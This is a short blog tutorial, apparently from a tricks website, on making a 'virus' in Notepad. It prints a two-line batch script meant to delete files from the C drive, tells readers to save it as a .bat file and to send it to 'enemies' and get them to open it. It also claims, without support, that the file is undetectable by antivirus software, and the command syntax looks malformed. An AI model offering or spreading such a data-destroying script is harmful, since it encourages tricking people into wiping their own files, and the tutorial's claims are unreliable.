Create a small virus using Notepad


Today I will show you how to create a simple but powerful virus which will delete files from entire C drive and also undetectable by any of the antivirus softwares.

Create a small virus using Notepad
Create a small virus using Notepad_FunWidTricks.Com

Steps you have to perform
1. Open "Notepad".
2. Copy and paste below code into it. You can also change C: with any other drive letter to delete files present on your specified directory instead of C: drive!
@Echo off
Del C:\ *.* |y
Create a small virus using Notepad_FunWidTricks.Com
3. Save file as "anyname.bat". Here .bat extension is necessary. Change "Save type as" to "All files".


Create a small virus using Notepad_FunWidTricks.Com
4. Distribute the file with your enemies and ask them to open it. (You should not use on your own system until and unless you want your system in dead state :D)

Create a small virus using Notepad_FunWidTricks.Com


Link your website with us for free!



author

About Author

I’m Vinay Vernekar , a young Entrepreneur and a Technology blogger, currently living in Kolhapur, Maharashtra, India. Founder and Main author of Fun With Tricks. I am also running web hosting services at Host With Us and King Of Web Host. if you like this article, pin it with social media, subscribe to our newsletter. Follow me on Google Plus, Facebook, Linkedin and Twitter.

Know more about me!

Mail me your quries at admin@funwithtricks.com

Get Free Email Updates to your Inbox!